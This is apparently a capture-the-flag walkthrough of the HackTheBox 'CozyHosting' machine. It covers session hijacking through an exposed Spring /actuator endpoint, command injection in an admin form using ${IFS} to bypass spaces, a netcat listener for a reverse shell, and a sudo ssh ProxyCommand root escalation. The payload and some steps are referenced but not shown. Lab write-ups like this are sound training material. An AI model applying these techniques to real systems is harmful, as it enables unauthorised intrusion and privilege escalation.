In this walkthrough, important information such as hashes, passwords, etc. are censored (the length of the censored information cannot correspond to the real length of the information)
Enumeration
Nmap
Nmap scan results are pretty useless, cause the results show that only ports 22 and 80 are opened.
localhost
nmap cozyhosting.htbStarting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 02:01 CEST Nmap scan report for cozyhosting.htb (10.10.11.230) Host is up (0.059s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE22/tcp open ssh80/tcp open http
Website analysis
The first thing you can see is the Login button, when you click it, you will be redirected to a login form.
I opened the dev tools and inspected the cookies, but nothing seemed to be present.
So I tried to log in with random credentials and a cookie will be created.
JSESSIONID... I did some research and found immediately that this website is using Spring.
DirBuster
At this point, I used DirBuster with a wordlist specific to Spring websites.
An interesting URL appears in the URLs list:
cozyhosting.htb/actuator
As you can see on these endpoints, we can get the cookie value of the user kanderson.
So if we replace our cookie value with this and refresh the login page... we are in!
Reverse shell
In the admin panel, there is a form.
So I opened BurpSuite and started making some attempts.
As you can see, if we leave the username blank, an interesting thing happens.
request
POST /executessh HTTP/1.1Host: cozyhosting.htbContent-Length: 24Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://cozyhosting.htbContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://cozyhosting.htb/adminAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: JSESSIONID=BAFF382D757706D0013D8BB41D69E6F2Connection: closehost=localhost&username=
I started making some tries, and after various research, I found a way to bypass spaces (${IFS}) and a payload to get a reverse shell.
So using the payload below, you can get a reverse shell.
You have to replace base64Payload with the reverse shell code, you can obtain this code already in base64 format using the Reverse Shell Generator.
Clearly, before submitting the payload above, you have to open a listener on your local host.
If you have a firewall running on your computer, remember to disable/configure it.
localhost
nc -lvp 4444
Stabilize shell
We get our shell!
Now we are user app and we are connected to the remote host.
But we want to stabilize our shell to make it easy to use. I found this tutorial.
Python server
First, run the command ls. Did you find something strange?
remotehost
cloudhosting-0.0.1.jar
We see that a jar file is here, We want to inspect it, so using python we can start an HTTP server and download the file on our host.
josh@cozyhosting:~$ sudo -l[sudo] password for josh: Matching Defaults entries for josh on localhost:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser josh may run the following commands on localhost:(root) /usr/bin/ssh *
we can see that user josh can run the ssh command as root.
I made research on GTFOBins I found an exploit
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Spawn interactive root shell through ProxyCommand option.
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
remotehost
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x[sudo] password for josh: # insert the password you cracked before
CozyHosting
Root flag
Now using the command cd /root we go to the folder where root.txt is located.
